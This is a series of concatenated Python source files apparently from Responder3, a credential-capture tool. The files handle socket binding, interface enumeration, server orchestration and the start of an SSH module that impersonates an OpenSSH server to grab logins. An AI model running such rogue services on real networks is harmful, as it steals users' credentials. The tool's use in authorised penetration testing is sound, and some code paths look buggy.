				sock.bind(
					(
						str(bind_ip_override) if bind_ip_override is not None else str(socket_config.bind_addr),
						int(socket_config.bind_port)
					)
				)

			elif socket_config.bind_family == 6:
				if not socket.has_ipv6:
					raise Exception('IPv6 is NOT supported on this platform')
				if str(bind_ip_override) == '0.0.0.0':
					bind_ip_override = ipaddress.ip_address('::')
				sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
				sock.setblocking(False)
				sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

				if socket_config.platform in [ResponderPlatform.LINUX, ResponderPlatform.MAC]:
					if socket_config.reuse_address:
						sock.setsockopt(socket.SOL_SOCKET, 25, socket_config.bind_iface.encode())
					if socket_config.reuse_port:
						sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)

				if socket_config.platform in [ResponderPlatform.LINUX, ResponderPlatform.MAC]:
					sock.bind(
						(
							str(bind_ip_override) if bind_ip_override is not None else str(socket_config.bind_addr),
							int(socket_config.bind_port),
							socket_config.bind_iface_idx
						)
					)
				elif socket_config.platform == ResponderPlatform.WINDOWS:
					sock.bind(
						(
							str(socket_config) if bind_ip_override is not None else str(socket_config.bind_addr),
							int(socket_config.bind_port)
						)
					)

			else:
				raise Exception('Unknown IP version')

		elif socket_config.bind_protocol == socket.SOCK_STREAM:
			if socket_config.bind_family == 4:
				sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
				sock.setblocking(False)
				if socket_config.platform == ResponderPlatform.LINUX:
					if socket_config.reuse_address:
						sock.setsockopt(socket.SOL_SOCKET, 25, socket_config.bind_iface.encode())
					if socket_config.reuse_port:
						sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
				sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR ,1)
				sock.bind(
					(
						str(bind_ip_override) if bind_ip_override is not None else str(socket_config.bind_addr),
						int(socket_config.bind_port)
					)
				)

			elif socket_config.bind_family == 6:
				if not socket.has_ipv6:
					raise Exception('IPv6 is NOT supported on this platform')
				if str(bind_ip_override) == '0.0.0.0':
					bind_ip_override = ipaddress.ip_address('::')
				sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_TCP)
				sock.setblocking(False)
				if socket_config.platform in [ResponderPlatform.LINUX, ResponderPlatform.MAC]:
					if socket_config.reuse_address:
						sock.setsockopt(socket.SOL_SOCKET, 25, socket_config.bind_iface.encode())
					if socket_config.reuse_port:
						sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
				sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR ,1)
				if socket_config.platform in [ResponderPlatform.LINUX, ResponderPlatform.MAC]:
					sock.bind(
						(
							str(bind_ip_override) if bind_ip_override is not None else str(socket_config.bind_addr),
							int(socket_config.bind_port),
							socket_config.bind_iface_idx
						)
					)
				elif socket_config.platform == ResponderPlatform.WINDOWS:
					sock.bind(
						(
							str(bind_ip_override) if bind_ip_override is not None else str(socket_config.bind_addr),
							int(socket_config.bind_port)
						)
					)

			else:
				raise Exception('Unknown IP version')
		else:
			raise Exception('Unknown protocol!')

		if not socket_config.is_server:
			socket_config.bind_port = socket.gethostname()[1]

		return sock
	except Exception as e:
		# print(socket_config)
		raise type(e)(str(e) +
					  'Failed to set up socket for on IP %s PORT %s FAMILY %s IP_OVERRIDE %s' % (
						  str(socket_config.bind_addr),
						  socket_config.bind_port,
						  socket_config.bind_family,
						  str(bind_ip_override)),
					  sys.exc_info()[2]).with_traceback(sys.exc_info()[2])



import ipaddress
import socket

from responder3.core.interfaces.NetworkInterface import NetworkInterface

def get_linux_ifaddrs():
	"""
	Enumerates all network interfaces and all IP addresses assigned for each interfaces both IPv4 and IPv6 on Linux host
	:return: list of NetworkInterface
	"""
	from socket import AF_INET, AF_INET6, inet_ntop
	from ctypes import (
		Structure, Union, POINTER,
		pointer, get_errno, cast,
		c_ushort, c_byte, c_void_p, c_char_p, c_uint, c_int, c_uint16, c_uint32
	)
	import ctypes.util
	import ctypes

	class struct_sockaddr(Structure):
		_fields_ = [
			('sa_family', c_ushort),
			('sa_data', c_byte * 14),]

	class struct_sockaddr_in(Structure):
		_fields_ = [
			('sin_family', c_ushort),
			('sin_port', c_uint16),
			('sin_addr', c_byte * 4)]

	class struct_sockaddr_in6(Structure):
		_fields_ = [
			('sin6_family', c_ushort),
			('sin6_port', c_uint16),
			('sin6_flowinfo', c_uint32),
			('sin6_addr', c_byte * 16),
			('sin6_scope_id', c_uint32)]

	class union_ifa_ifu(Union):
		_fields_ = [
			('ifu_broadaddr', POINTER(struct_sockaddr)),
			('ifu_dstaddr', POINTER(struct_sockaddr)),]

	class struct_ifaddrs(Structure):
		pass
	struct_ifaddrs._fields_ = [
		('ifa_next', POINTER(struct_ifaddrs)),
		('ifa_name', c_char_p),
		('ifa_flags', c_uint),
		('ifa_addr', POINTER(struct_sockaddr)),
		('ifa_netmask', POINTER(struct_sockaddr)),
		('ifa_ifu', union_ifa_ifu),
		('ifa_data', c_void_p),]

	libc = ctypes.CDLL(ctypes.util.find_library('c'))

	def ifap_iter(ifap):
		ifa = ifap.contents
		while True:
			yield ifa
			if not ifa.ifa_next:
				break
			ifa = ifa.ifa_next.contents

	def getfamaddr(sa):
		family = sa.sa_family
		addr = None
		if family == AF_INET:
			sa = cast(pointer(sa), POINTER(struct_sockaddr_in)).contents
			addr = inet_ntop(family, sa.sin_addr)
		elif family == AF_INET6:
			sa = cast(pointer(sa), POINTER(struct_sockaddr_in6)).contents
			addr = inet_ntop(family, sa.sin6_addr)
		return family, addr

	ifap = POINTER(struct_ifaddrs)()
	result = libc.getifaddrs(pointer(ifap))
	if result != 0:
		raise OSError(get_errno())
	del result
	try:
		interfacesd = {}
		for ifa in ifap_iter(ifap):
			ifname = ifa.ifa_name.decode("UTF-8")
			if ifname not in interfacesd:
				interfacesd[ifname] = NetworkInterface()
				interfacesd[ifname].ifname = ifname
				interfacesd[ifname].ifindex = libc.if_nametoindex(ifname)
			if ifa.ifa_addr:
				family, addr = getfamaddr(ifa.ifa_addr.contents)
			if family in [socket.SOCK_DGRAM, socket.SOCK_STREAM]:
				interfacesd[ifname].addresses.append(ipaddress.ip_address(addr))
		return interfacesd
	finally:
		libc.freeifaddrs(ifap)

def get_win_ifaddrs():
	"""
	Enumerates all network interfaces and all IP addresses assigned for each interfaces both IPv4 and IPv6 on Windows host
	:return: list of NetworkInterface
	"""
	import ctypes
	import struct
	import ipaddress
	import ctypes.wintypes
	from ctypes.wintypes import DWORD, WCHAR, BYTE, BOOL
	from socket import AF_INET, AF_UNSPEC, AF_INET6
	
	# from iptypes.h
	MAX_ADAPTER_ADDRESS_LENGTH = 8
	MAX_DHCPV6_DUID_LENGTH = 130

	GAA_FLAG_INCLUDE_PREFIX = ctypes.c_ulong(0x0010)
	
	class SOCKADDR(ctypes.Structure):
		_fields_ = [
			('family', ctypes.c_ushort),
			('data', ctypes.c_byte*14),
			]
	LPSOCKADDR = ctypes.POINTER(SOCKADDR)
	
	class IN6_ADDR(ctypes.Structure):
		_fields_ = [
			('byte', ctypes.c_byte*16),
			('word', ctypes.c_byte*16), #this should be changed
			]
	
	class SOCKADDR_IN6(ctypes.Structure):
		_fields_ = [
			('family', ctypes.c_short),
			('port', ctypes.c_ushort),
			('flowinfo', ctypes.c_ulong),
			('addr', IN6_ADDR),
			('scope_id', ctypes.c_ulong),
			]
	LPSOCKADDR_IN6 = ctypes.POINTER(SOCKADDR_IN6)
	

	# NB: It's not true mapping of `sockaddr_storage` structure!
	class SOCKADDR_STORAGE(ctypes.Union):
		_fields_ = (('v4', LPSOCKADDR), ('v6', LPSOCKADDR_IN6))

	class SOCKET_ADDRESS(ctypes.Structure):
		_fields_ = [
			#('address', LPSOCKADDR),
			('address', SOCKADDR_STORAGE),
			('length', ctypes.c_int),
			]

	class _IP_ADAPTER_ADDRESSES_METRIC(ctypes.Structure):
		_fields_ = [
			('length', ctypes.c_ulong),
			('interface_index', DWORD),
			]

	class _IP_ADAPTER_ADDRESSES_U1(ctypes.Union):
		_fields_ = [
			('alignment', ctypes.c_ulonglong),
			('metric', _IP_ADAPTER_ADDRESSES_METRIC),
			]

	class IP_ADAPTER_UNICAST_ADDRESS(ctypes.Structure):
		pass
	PIP_ADAPTER_UNICAST_ADDRESS = ctypes.POINTER(IP_ADAPTER_UNICAST_ADDRESS)
	IP_ADAPTER_UNICAST_ADDRESS._fields_ = [
			("length", ctypes.c_ulong),
			("flags", ctypes.wintypes.DWORD),
			("next", PIP_ADAPTER_UNICAST_ADDRESS),
			("address", SOCKET_ADDRESS),
			("prefix_origin", ctypes.c_int),
			("suffix_origin", ctypes.c_int),
			("dad_state", ctypes.c_int),
			("valid_lifetime", ctypes.c_ulong),
			("preferred_lifetime", ctypes.c_ulong),
			("lease_lifetime", ctypes.c_ulong),
			("on_link_prefix_length", ctypes.c_ubyte)
			]

	# it crashes when retrieving prefix data :(
	class IP_ADAPTER_PREFIX(ctypes.Structure):
		pass
	PIP_ADAPTER_PREFIX = ctypes.POINTER(IP_ADAPTER_PREFIX)
	IP_ADAPTER_PREFIX._fields_ = [
		("alignment", ctypes.c_ulonglong),
		("next", PIP_ADAPTER_PREFIX),
		("address", SOCKET_ADDRESS),
		("prefix_length", ctypes.c_ulong)
		]

	class IP_ADAPTER_ADDRESSES(ctypes.Structure):
		pass
	LP_IP_ADAPTER_ADDRESSES = ctypes.POINTER(IP_ADAPTER_ADDRESSES)
	
	# for now, just use void * for pointers to unused structures
	PIP_ADAPTER_ANYCAST_ADDRESS = ctypes.c_void_p
	PIP_ADAPTER_MULTICAST_ADDRESS = ctypes.c_void_p
	PIP_ADAPTER_DNS_SERVER_ADDRESS = ctypes.c_void_p
	#PIP_ADAPTER_PREFIX = ctypes.c_void_p
	PIP_ADAPTER_WINS_SERVER_ADDRESS_LH = ctypes.c_void_p
	PIP_ADAPTER_GATEWAY_ADDRESS_LH = ctypes.c_void_p
	PIP_ADAPTER_DNS_SUFFIX = ctypes.c_void_p

	IF_OPER_STATUS = ctypes.c_uint # this is an enum, consider http://code.activestate.com/recipes/576415/
	IF_LUID = ctypes.c_uint64

	NET_IF_COMPARTMENT_ID = ctypes.c_uint32
	GUID = ctypes.c_byte*16
	NET_IF_NETWORK_GUID = GUID
	NET_IF_CONNECTION_TYPE = ctypes.c_uint # enum
	TUNNEL_TYPE = ctypes.c_uint # enum

	IP_ADAPTER_ADDRESSES._fields_ = [
		#('u', _IP_ADAPTER_ADDRESSES_U1),
			('length', ctypes.c_ulong),
			('interface_index', DWORD),
		('next', LP_IP_ADAPTER_ADDRESSES),
		('adapter_name', ctypes.c_char_p),
		('first_unicast_address', PIP_ADAPTER_UNICAST_ADDRESS),
		('first_anycast_address', PIP_ADAPTER_ANYCAST_ADDRESS),
		('first_multicast_address', PIP_ADAPTER_MULTICAST_ADDRESS),
		('first_dns_server_address', PIP_ADAPTER_DNS_SERVER_ADDRESS),
		('dns_suffix', ctypes.c_wchar_p),
		('description', ctypes.c_wchar_p),
		('friendly_name', ctypes.c_wchar_p),
		('byte', BYTE*MAX_ADAPTER_ADDRESS_LENGTH),
		('physical_address_length', DWORD),
		('flags', DWORD),
		('mtu', DWORD),
		('interface_type', DWORD),
		('oper_status', IF_OPER_STATUS),
		('ipv6_interface_index', DWORD),
		('zone_indices', DWORD),
		('first_prefix', PIP_ADAPTER_PREFIX),
		('transmit_link_speed', ctypes.c_uint64),
		('receive_link_speed', ctypes.c_uint64),
		('first_wins_server_address', PIP_ADAPTER_WINS_SERVER_ADDRESS_LH),
		('first_gateway_address', PIP_ADAPTER_GATEWAY_ADDRESS_LH),
		('ipv4_metric', ctypes.c_ulong),
		('ipv6_metric', ctypes.c_ulong),
		('luid', IF_LUID),
		('dhcpv4_server', SOCKET_ADDRESS),
		('compartment_id', NET_IF_COMPARTMENT_ID),
		('network_guid', NET_IF_NETWORK_GUID),
		('connection_type', NET_IF_CONNECTION_TYPE),
		('tunnel_type', TUNNEL_TYPE),
		('dhcpv6_server', SOCKET_ADDRESS),
		('dhcpv6_client_duid', ctypes.c_byte*MAX_DHCPV6_DUID_LENGTH),
		('dhcpv6_client_duid_length', ctypes.c_ulong),
		('dhcpv6_iaid', ctypes.c_ulong),
		('first_dns_suffix', PIP_ADAPTER_DNS_SUFFIX),
		]

	def GetAdaptersAddresses():
		"""
		Returns an iteratable list of adapters
		""" 
		size = ctypes.c_ulong()
		GetAdaptersAddresses = ctypes.windll.iphlpapi.GetAdaptersAddresses
		GetAdaptersAddresses.argtypes = [
			ctypes.c_ulong,
			ctypes.c_ulong,
			ctypes.c_void_p,
			ctypes.POINTER(IP_ADAPTER_ADDRESSES),
			ctypes.POINTER(ctypes.c_ulong),
		]
		GetAdaptersAddresses.restype = ctypes.c_ulong
		#res = GetAdaptersAddresses(AF_INET,0,None, None,size)
		res = GetAdaptersAddresses(AF_UNSPEC,0,None, None,size)
		if res != 0x6f: # BUFFER OVERFLOW
			raise RuntimeError("Error getting structure length (%d)" % res)
		pointer_type = ctypes.POINTER(IP_ADAPTER_ADDRESSES)
		size.value = 15000
		buffer = ctypes.create_string_buffer(size.value)
		struct_p = ctypes.cast(buffer, pointer_type)
		#res = GetAdaptersAddresses(AF_INET,0,None, struct_p, size)
		res = GetAdaptersAddresses(AF_UNSPEC,0,None, struct_p, size)
		if res != 0x0: # NO_ERROR:
			raise RuntimeError("Error retrieving table (%d)" % res)
		while struct_p:
			yield struct_p.contents
			struct_p = struct_p.contents.next

	interfaced = {}
	for i in GetAdaptersAddresses():
		interface = NetworkInterface()
		interface.ifname  = i.description
		interface.ifindex = i.zone_indices #zone_indices in windows
		
		
		addresses = i.first_unicast_address
		
		while addresses:
			
			fu = addresses.contents
			
			ipversion = fu.address.address.v4.contents.family			
			if ipversion == AF_INET:
				ad = fu.address.address.v4.contents
				#print("\tfamily: {0}".format(ad.family))
				ip_int = struct.unpack('>2xI8x', ad.data)[0]
				interface.addresses.append(ipaddress.IPv4Address(ip_int))
			elif ipversion == AF_INET6:
				ad = fu.address.address.v6.contents
				ip_int = struct.unpack('!QQ', ad.addr.byte)[0]
				interface.addresses.append(ipaddress.IPv6Address(ip_int))
			
			addresses = addresses.contents.next
			
		interfaced[interface.ifname] = interface
	return interfaced




#https://github.com/FreeRDP/FreeRDP/blob/eb1727bb875f27d7e02d47e0cc02f2e6546153e1/libfreerdp/core/tpdu.c
import enum

class X224_TPDU_TYPE(enum.Enum):
	X224_TPDU_CONNECTION_REQUEST = 0xE0
	X224_TPDU_CONNECTION_CONFIRM = 0xD0
	X224_TPDU_DISCONNECT_REQUEST = 0x80
	X224_TPDU_DATA = 0xF0
	X224_TPDU_ERROR = 0x70

class TPDU:
	def __init__(self):
		self.LI = None #1 byte
		self.Code = None#1 byte
		self.DST_REF = None#2 byte
		self.SRC_REF = None#2 byte
		self.Class = None#1 byte


import os
import sys
import copy
import json
import logging
import argparse
import datetime
import asyncio
import itertools
import importlib.machinery
import importlib.util
import warnings

from responder3.core.commons import handle_systemd, defaultports, tracefunc
from responder3.core.interfaces.NetworkInterfaces import interfaces
from responder3.core.logging.logger import *
from responder3.core.logging.logtask import *
from responder3.core.servertask import Responder3ServerTask
from responder3.core.rdns import RDNS
from responder3.core.manager.r3manager_client import *
from responder3.core.manager.r3manager_server import *


class ServerTaskEntry:
	def __init__(self, taskid):
		self.taskid = taskid
		self.startup_config = None
		self.task = None
		self.server = None
		self.command_channel_manager = asyncio.Queue()
		self.command_channel_client = asyncio.Queue()
		#self.shutdown_event = asyncio.Event()
		self.created_at = datetime.datetime.utcnow()
		self.started_at = None


class Responder3:
	def __init__(self):
		self.loop = asyncio.get_event_loop()
		self.config = None

		self.reverse_domain_table = {}
		self.resolver_server = [{'ip':'8.8.8.8', 'port':53, 'proto' : 'udp'}]
		self.resolver_server6 = [{ 'ip': '2001:4860:4860::8888', 'port':53, 'proto' : 'udp'}]


		self.log_queue = asyncio.Queue()
		self.logger = Logger('Responder3 MAIN', logQ = self.log_queue)
		self.log_command_queue = asyncio.Queue()
		self.logprocessor = None
		self.test_output_queue = None #log queue for tests only
		self.manager_log_queue = None #this wueue is to dispatch all local log objects to the manager object if any

		self.override_interfaces = None
		self.override_ipv4 = None
		self.override_ipv6 = None
		self.override_verb = None

		self.server_task_id = 0
		self.servers = []
		self.server_tasks = {}
		
		self.manager_task = None
		self.manager_cmd_queue_in = asyncio.Queue()
		self.manager_cmd_queue_out = asyncio.Queue()
		self.manager_shutdown_evt = asyncio.Event()

		self.shutdown_evt = asyncio.Event()


	@staticmethod
	def get_argparser():
		parser = argparse.ArgumentParser(
			description='Responder3',
			epilog='List of available interfaces:\r\n' + str(interfaces),
			formatter_class=argparse.RawTextHelpFormatter
		)
		parser.add_argument(
			"-c",
			"--config",
			help="Configuration file (JSON). Full path please"
		)
		parser.add_argument(
			"-p",
			"--python-config",
			help="Configuration file (Python). Full path please"
		)
		parser.add_argument(
			"-e",
			"--environ-config",
			action='store_true',
			help="Configuration file is set via OS environment variable (Python script)"
		)
		parser.add_argument(
			"-I",
			action='append',
			help="Interface to bind to, can be multiple by providing sequential -I. Overrides bind_iface parameter in configs."
		)
		parser.add_argument(
			"-4",
			action='store_true',
			dest='ip4',
			help="IP version 4 to be used. Overrides bind_family in config settings."
		)
		parser.add_argument(
			"-6",
			action='store_true',
			dest='ip6',
			help="IP version 6 to be used. Overrides bind_family in config settings."
		)
		parser.add_argument(
			"-L",
			action='store_true',
			dest='list_interfaces',
			help="List all interfaces with assigned IPv4 and IPv6 addresses then exit."
		)
		parser.add_argument(
			'-v',
			'--verbose',
			action='count',
			default=0
		)
		return parser

	@staticmethod
	def from_args(args):
		if args.list_interfaces == True:
			print('====== Interfaces list ======')
			print(interfaces)
			return None

		responder = Responder3()
		responder.override_interfaces = args.I
		responder.override_ipv4 = args.ip4
		responder.override_ipv6 = args.ip6
		responder.override_verb = args.verbose
		if args.config is not None:
			responder.config = Responder3Config.from_file(args.config)
		elif args.python_config is not None:
			responder.config = Responder3Config.from_python_script(args.python_config)
		elif args.environ_config is not None:
			responder.config = Responder3Config.from_os_env()
		else:
			raise Exception(
				'No suitable configuration method was supplied!'
				'Use either -e or -c or -p'
			)
		return responder

	@staticmethod
	def from_config(config, override_interfaces = None, override_ipv4 = None, override_ipv6=None, override_verb=None, output_queue = None):
		responder = Responder3()
		responder.override_interfaces = override_interfaces
		responder.override_ipv4 = override_ipv4
		responder.override_ipv6 = override_ipv6
		responder.override_verb = override_verb
		responder.test_output_queue = output_queue
		responder.config = config
		return responder

	def get_taskid(self):
		taskid = self.server_task_id
		self.server_task_id += 1
		return taskid

	@r3exception
	async def start_server_task(self, serverconfig):
		ste = ServerTaskEntry(self.get_taskid())
		temp = copy.deepcopy(serverconfig)
		resolver_server = temp['resolver'] if 'resolver' in temp else self.resolver_server
		resolver_server6 = temp['resolver6'] if 'resolver6' in temp else self.resolver_server6
		ste.startup_config = temp
		ste.task = Responder3ServerTask(
			log_queue = self.log_queue,
			rdns_resolver = RDNS(resolver_server, resolver_server6),
			reverse_domain_table=self.reverse_domain_table,
			server_command_queue=None,
			loop=self.loop
		)
		ste.server = await ste.task.create_server(temp)
		self.server_tasks[ste.taskid] = ste
		asyncio.ensure_future(ste.server.serve_forever())
		ste.started_at = datetime.datetime.utcnow()
		del temp

		return ste.taskid

	@r3exception
	async def list_servers(self, cmd):
		print('list_servers')
		servers = {}
		for taskid in self.server_tasks:
			servers[taskid] = self.server_tasks[taskid].startup_config
		rply = R3CliListServersRply(servers = servers)
		await self.manager_cmd_queue_out.put(rply)


	@r3exception
	async def create_server(self, cmd):
		print('create_server')
		server_id = await self.start_server_task(cmd.server_config) #TODO! dict_config

		rply = R3CliCreateServerRply(server_id = server_id)
		await self.manager_cmd_queue_out.put(rply)
		
	@r3exception
	async def list_interfaces(self, cmd):
		try:
			print('list interfaces cmd in')
			ifs = {}
			
			for ifname in interfaces.interfaces:
				ifs[ifname] = interfaces.interfaces[ifname].to_json()
				
			rply = R3CliListInterfacesRply(interfaces = ifs)
			await self.manager_cmd_queue_out.put(rply)
			print('Reply sent')
		except Exception as e:
			traceback.print_exc()

	@r3exception
	async def stop_server(self, cmd):
		if cmd.server_id not in self.server_tasks:
			print('Server ID doesnt exist!')
			return
		
		try:
			self.server_tasks[cmd.server_id].server.close()
			del self.server_tasks[cmd.server_id]
			print(type(self.server_tasks[cmd.server_id].task))
		except Exception as e:
			traceback.print_exc()
			rply = R3CliServerStopRply(status = 'NO')
		else:
			rply = R3CliServerStopRply(status = 'OK')
		
		await self.manager_cmd_queue_out.put(rply)


	@r3exception
	async def shutdown(self, cmd):
		#TODO: make it fancy

		self.shutdown_evt.set()
		

	@r3exception
	async def handle_remote_commands(self):
		"""
		If manager is set up and is in CLIENT mode, 
		this method will handle the remote commands 
		coming from the remote manager server
		"""
		try:
			while True:
				cmd = await self.manager_cmd_queue_in.get()
				print(cmd.cmd_id)
				if cmd.cmd_id == R3ClientCommand.SHUTDOWN:
					await self.shutdown(cmd)
				elif cmd.cmd_id == R3ClientCommand.STOP_SERVER:
					await self.stop_server(cmd)
				elif cmd.cmd_id == R3ClientCommand.LIST_SERVERS:
					await self.list_servers(cmd)
				elif cmd.cmd_id == R3ClientCommand.CREATE_SERVER:
					await self.create_server(cmd)
				elif cmd.cmd_id == R3ClientCommand.LIST_INTERFACES:
					await self.list_interfaces(cmd)
				else:
					print('Unknown command in queue!')				
				
		except Exception as e:
			"""
			if there is an exception we set the shutdown event on the server
			"""
			traceback.print_exc()
			self.manager_shutdown_evt.set()
			return
		
	@r3exception
	async def start_manager(self):
		"""
		Start remote manager client/server if config has it
		"""
		if not self.config.manager_settings:
			return
		
		if self.config.manager_settings['mode'] == 'CLIENT':
			print('Starting manager in CLIENT mode')
			server_url = self.config.manager_settings['server_url']
			config = self.config.manager_settings['config']
			ssl_ctx = None
			if 'ssl_ctx' in self.config.manager_settings:
				ssl_ctx = self.config.manager_settings['ssl_ctx']
			
			asyncio.ensure_future(self.handle_remote_commands()) #starting command handler
			
			self.manager_task = Responder3ManagerClient(
								server_url, 
								config, 
								self.log_queue,
								self.manager_log_queue, 
								self.manager_cmd_queue_in, 
								self.manager_cmd_queue_out, 
								self.manager_shutdown_evt, 
								ssl_ctx
			)
			asyncio.ensure_future(self.manager_task.run())
		
		elif self.config.manager_settings['mode'] == 'SERVER':
			self.manager_log_queue = None #this queue is to dispatch all local log objects to the manager object if any
			self.manager_task = None
			
			print('Starting manager in SERVER mode')
			listen_ip = self.config.manager_settings['listen_ip']
			listen_port = self.config.manager_settings['listen_port']
			config = self.config.manager_settings['config']
			ssl_ctx = None
			if 'ssl_ctx' in self.config.manager_settings:
				ssl_ctx = self.config.manager_settings['ssl_ctx']
			
			
			self.manager_task = Responder3ManagerServer(listen_ip, listen_port, config, self.log_queue, self.log_queue, self.manager_cmd_queue_in, self.manager_cmd_queue_out, self.manager_shutdown_evt, ssl_ctx = ssl_ctx)
			asyncio.ensure_future(self.manager_task.run())
			
		
		else:
			raise Exception('Failed to set up manager! Unknown mode!')

	def get_serverconfigs(self):
		# Setting up and starting servers
		for serverentry in self.config.server_settings:
			if self.override_interfaces is None:
				ifaces = serverentry.get('bind_iface', None)
				if ifaces is None:
					raise Exception('Interface name MUST be provided!')
				if not isinstance(ifaces, list):
					ifaces = [ifaces]

			else:
				ifaces = self.override_interfaces
			bind_family = []
			if self.override_ipv4:
				bind_family.append(4)
			if self.override_ipv6:
				bind_family.append(6)

			if bind_family == []:
				bind_family_conf = serverentry.get('bind_family', None)
				if bind_family_conf is not None:
					if not isinstance(bind_family_conf, list):
						bind_family.append(int(bind_family_conf))
					else:
						for ver in bind_family_conf:
							bind_family.append(int(ver))

			if bind_family == []:
				raise Exception('IP version (bind_family) MUST be set either in config file or in command line!')

			portspecs = serverentry.get(
				'bind_port',
				defaultports[serverentry['handler']] if serverentry['handler'] in defaultports else None
			)

			if portspecs is None:
				raise Exception('For protocol %s the port must be supplied!' % (serverentry['handler'],))

			if not isinstance(portspecs, list):
				portspecs = [portspecs]

			for element in itertools.product(ifaces, portspecs):
				socket_configs = interfaces.get_socketconfig(
					element[0], element[1][0], element[1][1],
					ipversion=bind_family
				)
				for socket_config in socket_configs:
					serverentry['listener_socket_config'] = socket_config
					yield serverentry

	@r3exception
	async def run(self):
		try:
			if self.config.manager_settings is not None:
				if self.config.manager_settings['mode'] == 'CLIENT':
					self.manager_log_queue = asyncio.Queue()
				
			if self.config.startup is not None:
				if 'mode' in self.config.startup:
					if self.config.startup['mode'] == 'STANDARD':
						# starting in standalone mode...
						pass
					elif self.config.startup['mode'] == 'DEV':
						print('Starting in DEV mode!')
						os.environ['PYTHONASYNCIODEBUG'] = '1'
						os.environ['R3DEEPDEBUG'] = '1'
						self.loop.set_debug(True)

						# Make the threshold for "slow" tasks very very small for
						# illustration. The default is 0.1, or 100 milliseconds.
						self.loop.slow_callback_duration = 0.001

						# Report all mistakes managing asynchronous resources.
						warnings.simplefilter('always', ResourceWarning)

						# sys.settrace(tracefunc)

					elif self.config.startup['mode'] == 'TEST':
						os.environ['PYTHONASYNCIODEBUG'] = '1'
						os.environ['R3DEEPDEBUG'] = '1'
						if self.test_output_queue is None:
							self.test_output_queue = multiprocessing.Queue()
						if 'extensions' not in self.config.log_settings:
							self.config.log_settings['handlers'] = {}
						if 'TEST' not in self.config.log_settings['handlers']:
							self.config.log_settings['handlers']['TEST'] = 'TEST'
						if 'TEST' not in self.config.log_settings:
							self.config.log_settings['TEST'] = {}
						if 'output_queue' not in self.config.log_settings['TEST']:
							self.config.log_settings['TEST']['output_queue'] = self.test_output_queue

					elif self.config.startup['mode'] == 'SERVICE':
						if 'pidfile' not in self.config.startup['settings']:
							raise Exception('pidfile MUST be set when running in service mode')
						handle_systemd(self.config.startup['settings']['pidfile'])

				else:
					# starting in standalone mode...
					pass
			else:
				# starting in standalone mode...
				pass

			self.logprocessor = LogProcessor(self.config.log_settings, self.log_queue, manager_log_queue = self.manager_log_queue)
			self.loop.create_task(self.logprocessor.run())

			for serverconfig in self.get_serverconfigs():
				await self.start_server_task(serverconfig)
				
			await self.start_manager()

			await self.logger.info('Started all servers')
			#self.loop.run_forever()
			await self.shutdown_evt.wait()

		except KeyboardInterrupt:
			await self.logger.warning('CTRL+C pressed, exiting!')
			sys.exit(0)


class Responder3Config:
	CONFIG_OS_KEY = 'R3CONFIG'

	def __init__(self):
		self.startup = None
		self.log_settings = None
		self.server_settings = None
		self.manager_settings = None

	@staticmethod
	def from_dict(config):
		conf = Responder3Config()
		conf.startup = config['startup']
		conf.log_settings = config['logsettings']
		conf.server_settings = config['servers']
		if 'remote_manager' in config:
			conf.manager_settings = config['remote_manager']
		return conf

	@staticmethod
	def from_json(config_data):
		return Responder3Config.from_dict(json.loads(config_data))

	@staticmethod
	def from_file(file_path):
		with open(file_path, 'r') as f:
			config = json.load(f)
		return Responder3Config.from_dict(config)

	@staticmethod
	def from_python_script(file_path):
		loader = importlib.machinery.SourceFileLoader('responderconfig', file_path)
		spec = importlib.util.spec_from_loader(loader.name, loader)
		responderconfig = importlib.util.module_from_spec(spec)
		loader.exec_module(responderconfig)
		conf = Responder3Config()
		conf.startup = responderconfig.startup
		conf.log_settings = responderconfig.logsettings
		conf.server_settings = responderconfig.servers
		conf.manager_settings =  getattr(responderconfig, 'remote_manager', None) 

		return conf

	@staticmethod
	def from_os_env():
		config_file = os.environ.get(Responder3Config.CONFIG_OS_KEY)
		if config_file is None:
			raise Exception(
				'Could not find configuration file path in os environment variables!'
				'Name to be set: %s' % Responder3Config.CONFIG_OS_KEY
			)
		return Responder3Config.from_python_script(config_file)



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
# Module to grab SSH credentials

import logging
import asyncio


from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.SSH import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession

#

class SSHSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.cipher = None
		self.state = 'BANNER'
		self.client_banner = None
		self.server_banner = 'SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2'
		self.client_kxinit = None
		self.server_kxinit = None
		self.parser = SSHParser
		self.sequence_number = 0

	def increase_seq_no(self):
		self.sequence_number += 1
		self.sequence_number = self.sequence_number % 2**32

	def get_seq_no(self):
		return self.sequence_number.to_bytes(4, byteorder = 'big', signed = False)

	def __repr__(self):
		t  = '== SSHSession ==\r\n'
		return t


class SSH(ResponderServer):
	def init(self):
		self.parse_settings()
		
	def parse_settings(self):
		self.privkey_file = self.settings['privkey_file']
		self.banner = None
		if 'banner' in self.settings:
			self.banner = self.settings['banner']

	@r3trafficlogexception
	async def send_enc_packet(self, payload):
		packet = SSHPacket()
		packet.payload = payload

		data = packet.to_bytes(cipher = self.session.cipher)
		data_enc = self.session.cipher.server_cipher.encrypt(data)
		mac_obj = self.session.cipher.get_server_hmac()
		mac_obj.update(self.session.get_seq_no())
		mac_obj.update(data)
		mac = mac_obj.digest()

		self.cwriter.write(data_enc + mac)
		await self.cwriter.drain()
		self.session.increase_seq_no()

	@r3trafficlogexception
	async def send_packet(self, payload):
		packet = SSHPacket()
		packet.payload = payload
		self.cwriter.write(packet.to_bytes())
		await self.cwriter.drain()

		self.session.increase_seq_no()


	async def banner_exchange(self, timeout=1):
		try:
			#read client banner
			client_banner = await readline_or_exc(self.creader, timeout=timeout)
